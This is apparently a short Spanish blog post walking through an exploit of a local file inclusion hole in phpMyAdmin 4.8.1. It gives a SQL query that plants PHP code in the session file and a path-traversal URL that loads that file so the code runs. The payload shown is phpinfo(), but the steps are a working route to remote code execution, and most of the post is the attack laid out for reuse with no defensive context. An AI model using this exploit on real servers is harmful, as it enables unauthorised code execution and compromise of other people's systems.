1.- Nos dirigimos a phpMyAdmin e iniciamos sesión.
2.- La version que estoy ejecutando actualmente es la 4.8.1
3.- Vamos a la pestaña SQL y ejecutamos la siguiente consulta: select '<?php phpinfo();exit;?>';
4.- Obtenemos la sesión (02sg7d31vi7pd23f4p45iv14jim83hob en este caso) de phpMyAdmin, en este caso estoy usando el complemento editThisCookie, pero también puede verlo desde la pestaña Application.
5.- Hacemos la peticion al archivo de la sesion por medio de LFI:
http://localhost/phpmyadmin/index.php?target=db_sql.php?/../../../../../../../../var/lib/php/sessions/sess_02sg7d31vi7pd23f4p45iv14jim83hob
En este caso navegamos hasta /var/lib/sessions/ que es donde se encuentran las sesiones
Y sess_tuidentificador
Y vuala:
Esto seria todo, lo mas complicado es encontrar el directorio donde se encuentran las sesiones guardadas y en todo si caso si es que las guarda, saludos!
No hay comentarios:
Publicar un comentario